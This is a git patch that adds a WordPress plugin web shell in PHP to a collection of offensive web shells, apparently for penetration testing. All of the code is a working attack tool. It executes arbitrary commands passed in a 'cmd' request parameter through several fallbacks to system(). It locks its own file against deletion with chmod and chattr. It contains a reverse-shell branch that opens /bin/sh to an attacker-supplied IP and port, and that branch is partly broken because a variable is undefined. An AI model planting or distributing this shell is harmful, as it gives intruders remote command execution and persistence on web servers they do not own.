From ec75402c12317864b22fd139e5a67ea847d4e974 Mon Sep 17 00:00:00 2001
From: Dejan Zelic <d.zelic@offensive-security.com>
Date: Mon, 2 Dec 2019 14:49:17 -0700
Subject: [PATCH] Added wordpress plugin shell by leonjza

---
 Web-Shells/WordPress/plugin-shell.php | 82 +++++++++++++++++++++++++++
 1 file changed, 82 insertions(+)
 create mode 100755 Web-Shells/WordPress/plugin-shell.php

diff --git a/Web-Shells/WordPress/plugin-shell.php b/Web-Shells/WordPress/plugin-shell.php
new file mode 100755
index 00000000..bac69fc9
--- /dev/null
+++ b/Web-Shells/WordPress/plugin-shell.php
@@ -0,0 +1,82 @@
+<?php
+    /*
+    Plugin Name: Cheap & Nasty Wordpress Shell
+    Plugin URI: https://github.com/leonjza/wordpress-shell
+    Description: Execute Commands as the webserver you are serving wordpress with! Shell will probably live at /wp-content/plugins/shell/shell.php. Commands can be given using the 'cmd' GET parameter. Eg: "http://192.168.0.1/wp-content/plugins/shell/shell.php?cmd=id", should provide you with output such as <code>uid=33(www-data) gid=verd33(www-data) groups=33(www-data)</code>
+    Author: Leon Jacobs
+    Version: 0.3
+    Author URI: https://leonjza.github.io
+    */
+
+# attempt to protect myself from deletion
+$this_file = __FILE__;
+@system("chmod ugo-w $this_file");
+@system("chattr +i $this_file");
+
+# Name of the parameter (GET or POST) for the command. Change this if the target already use this parameter.
+$cmd = 'cmd';
+
+# test if parameter 'cmd', 'ip or 'port' is present. If not this will avoid an error on logs or on all pages if badly configured.
+if(isset($_REQUEST[$cmd])) {
+
+    # grab the command we want to run from the 'cmd' GET or POST parameter (POST don't display the command on apache logs)
+    $command = $_REQUEST[$cmd];
+    executeCommand($command);
+    
+} else if(isset($_REQUEST[$ip]) && !isset($_REQUEST[$cmd])) {
+
+    $ip = $_REQUEST[$ip];
+    
+    # default port 443
+    $port = '443';
+    
+    if(isset($_REQUEST[$ip])){
+        $port = $_REQUEST[$port];
+    }
+    
+    # nc -nlvp 443
+    $sock = fsockopen($ip,$port);
+    $command = '/bin/sh -i <&3 >&3 2>&3';
+    
+    executeCommand($command);
+        
+}
+
+die();
+
+function executeCommand(string $command) {
+
+     # Try to find a way to run our command using various PHP internals
+    if (class_exists('ReflectionFunction')) {
+
+       # http://php.net/manual/en/class.reflectionfunction.php
+       $function = new ReflectionFunction('system');
+       $function->invoke($command);
+
+    } elseif (function_exists('call_user_func_array')) {
+
+       # http://php.net/manual/en/function.call-user-func-array.php
+       call_user_func_array('system', array($command));
+
+    } elseif (function_exists('call_user_func')) {
+
+       # http://php.net/manual/en/function.call-user-func.php
+       call_user_func('system', $command);
+    
+    } else if(function_exists('passthru')) {
+        
+       # https://www.php.net/manual/en/function.passthru.php
+       ob_start();
+       passthru($command , $return_var);
+       $output = ob_get_contents();
+       ob_end_clean();
+
+    } else if(function_exists('system')){
+
+       # this is the last resort. chances are PHP Suhosin
+       # has system() on a blacklist anyways :>
+
+       # http://php.net/manual/en/function.system.php
+       system($command);
+    }
+}